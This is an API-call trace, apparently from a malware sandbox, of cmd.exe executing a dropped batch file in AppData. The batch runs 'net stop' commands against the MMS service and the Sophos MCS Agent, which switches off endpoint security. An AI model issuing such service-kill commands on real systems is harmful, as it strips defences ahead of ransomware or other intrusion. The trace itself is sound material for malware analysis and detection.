[0217.570] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.570] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MMS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MMS /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MMS /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xbdc, dwThreadId=0xbbc)) returned 1 [0217.574] CloseHandle (hObject=0x74) returned 1 [0217.574] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.574] GetProcessHeap () returned 0x3e0000 [0217.574] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.574] GetEnvironmentStringsW () returned 0x3f8408* [0217.574] GetProcessHeap () returned 0x3e0000 [0217.574] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.574] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.574] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0217.710] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0217.710] CloseHandle (hObject=0x78) returned 1 [0217.710] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0217.710] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0217.710] GetProcessHeap () returned 0x3e0000 [0217.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.710] GetEnvironmentStringsW () returned 0x3f8408* [0217.710] GetProcessHeap () returned 0x3e0000 [0217.710] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.710] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.710] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.710] GetProcessHeap () returned 0x3e0000 [0217.710] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.710] GetEnvironmentStringsW () returned 0x3f8408* [0217.710] GetProcessHeap () returned 0x3e0000 [0217.711] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.711] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.711] GetProcessHeap () returned 0x3e0000 [0217.711] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0217.711] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0217.711] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.711] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0217.711] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.711] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0217.711] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.711] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0217.711] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.711] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0217.712] SetConsoleInputExeNameW () returned 0x1 [0217.712] GetConsoleOutputCP () returned 0x1b5 [0217.712] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0217.712] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0217.712] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0217.712] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.712] SetFilePointer (in: hFile=0x78, lDistanceToMove=5981, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x175d [0217.712] GetProcessHeap () returned 0x3e0000 [0217.712] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0217.712] GetProcessHeap () returned 0x3e0000 [0217.712] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0217.712] GetProcessHeap () returned 0x3e0000 [0217.712] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0217.712] GetProcessHeap () returned 0x3e0000 [0217.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0217.713] GetProcessHeap () returned 0x3e0000 [0217.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0217.713] GetProcessHeap () returned 0x3e0000 [0217.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0217.713] GetProcessHeap () returned 0x3e0000 [0217.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0217.713] GetProcessHeap () returned 0x3e0000 [0217.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0217.713] GetProcessHeap () returned 0x3e0000 [0217.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0217.713] GetProcessHeap () returned 0x3e0000 [0217.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0217.713] GetProcessHeap () returned 0x3e0000 [0217.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0217.713] GetProcessHeap () returned 0x3e0000 [0217.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0217.713] GetProcessHeap () returned 0x3e0000 [0217.713] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0217.713] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.713] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x175d [0217.713] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x164, lpOverlapped=0x0) returned 1 [0217.713] SetFilePointer (in: hFile=0x78, lDistanceToMove=6017, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1781 [0217.713] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=36, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos MCS AgentΓÇ¥ /y\r\n/y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 36 [0217.714] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.714] GetFileType (hFile=0x78) returned 0x1 [0217.714] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.714] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1781 [0217.714] GetProcessHeap () returned 0x3e0000 [0217.714] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0217.714] GetProcessHeap () returned 0x3e0000 [0217.714] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0217.717] _tell (_FileHandle=3) returned 6017 [0217.717] _close (_FileHandle=3) returned 0 [0217.717] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0217.717] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0217.717] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0217.718] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0217.718] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0217.718] _wcsicmp (_String1="net", _String2="CD") returned 11 [0217.718] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0217.718] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0217.718] _wcsicmp (_String1="net", _String2="REN") returned -4 [0217.718] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0217.718] _wcsicmp (_String1="net", _String2="SET") returned -5 [0217.718] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0217.718] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0217.718] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0217.718] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0217.718] _wcsicmp (_String1="net", _String2="MD") returned 1 [0217.718] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0217.718] _wcsicmp (_String1="net", _String2="RD") returned -4 [0217.718] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0217.718] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0217.718] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0217.718] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0217.718] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0217.718] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0217.718] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0217.718] _wcsicmp (_String1="net", _String2="VER") returned -8 [0217.718] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0217.718] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0217.718] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0217.718] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0217.718] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0217.718] _wcsicmp (_String1="net", _String2="START") returned -5 [0217.718] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0217.718] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0217.718] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0217.718] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0217.718] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0217.718] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0217.718] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0217.718] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0217.718] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0217.719] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0217.719] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0217.719] SetErrorMode (uMode=0x0) returned 0x1 [0217.719] GetProcessHeap () returned 0x3e0000 [0217.719] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0217.719] GetProcessHeap () returned 0x3e0000 [0217.719] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0217.719] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.719] GetProcessHeap () returned 0x3e0000 [0217.720] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0217.720] GetProcessHeap () returned 0x3e0000 [0217.720] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0217.720] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0217.720] GetProcessHeap () returned 0x3e0000 [0217.720] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0217.720] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.720] GetProcessHeap () returned 0x3e0000 [0217.720] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0217.720] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0217.720] GetProcessHeap () returned 0x3e0000 [0217.720] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0217.721] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.721] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.721] GetLastError () returned 0x2 [0217.722] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.722] GetLastError () returned 0x2 [0217.722] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.723] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.723] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.723] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.723] GetLastError () returned 0x2 [0217.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.724] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.724] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.725] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0217.725] SetErrorMode (uMode=0x0) returned 0x1 [0217.725] GetProcessHeap () returned 0x3e0000 [0217.725] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0217.725] GetProcessHeap () returned 0x3e0000 [0217.725] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0217.725] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.725] GetProcessHeap () returned 0x3e0000 [0217.725] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0217.725] GetProcessHeap () returned 0x3e0000 [0217.725] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0217.726] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0217.726] GetProcessHeap () returned 0x3e0000 [0217.726] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0217.726] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.726] GetProcessHeap () returned 0x3e0000 [0217.726] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0217.726] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0217.726] GetProcessHeap () returned 0x3e0000 [0217.726] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0217.727] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.727] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.727] GetLastError () returned 0x2 [0217.728] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.728] GetLastError () returned 0x2 [0217.728] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.728] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0217.729] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0217.729] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.729] GetLastError () returned 0x2 [0217.729] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0217.730] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0217.730] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.730] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0217.730] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0217.730] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0217.731] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.731] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos MCS AgentΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos MCS AgentΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos MCS AgentΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x5c8, dwThreadId=0x808)) returned 1 [0217.735] CloseHandle (hObject=0x78) returned 1 [0217.735] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.735] GetProcessHeap () returned 0x3e0000 [0217.735] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.735] GetEnvironmentStringsW () returned 0x3f8408* [0217.735] GetProcessHeap () returned 0x3e0000 [0217.735] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.736] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.736] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0217.891] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0217.891] CloseHandle (hObject=0x74) returned 1 [0217.891] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0217.891] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0217.891] GetProcessHeap () returned 0x3e0000 [0217.891] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.891] GetEnvironmentStringsW () returned 0x3f8408* [0217.891] GetProcessHeap () returned 0x3e0000 [0217.891] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.891] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.891] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.891] GetProcessHeap () returned 0x3e0000 [0217.891] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.891] GetEnvironmentStringsW () returned 0x3f8408* [0217.892] GetProcessHeap () returned 0x3e0000 [0217.892] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.892] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.892] GetProcessHeap () returned 0x3e0000 [0217.892] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0217.892] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0217.892] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.892] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0217.892] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.892] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0217.892] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.892] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0217.892] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.892] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0217.893] SetConsoleInputExeNameW () returned 0x1 [0217.893] GetConsoleOutputCP () returned 0x1b5 [0217.893] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0217.893] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0217.893] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0217.893] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.893] SetFilePointer (in: hFile=0x74, lDistanceToMove=6017, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1781 [0217.893] GetProcessHeap () returned 0x3e0000 [0217.893] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0217.893] GetProcessHeap () returned 0x3e0000 [0217.893] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0217.893] GetProcessHeap () returned 0x3e0000 [0217.893] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0217.894] GetProcessHeap () returned 0x3e0000 [0217.894] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0217.894] GetProcessHeap () returned 0x3e0000 [0217.894] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0217.894] GetProcessHeap () returned 0x3e0000 [0217.894] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0217.894] GetProcessHeap () returned 0x3e0000 [0217.894] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0217.894] GetProcessHeap () returned 0x3e0000 [0217.894] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0217.894] GetProcessHeap () returned 0x3e0000 [0217.894] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0217.894] GetProcessHeap () returned 0x3e0000 [0217.894] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0217.894] GetProcessHeap () returned 0x3e0000 [0217.894] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0217.894] GetProcessHeap () returned 0x3e0000 [0217.894] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 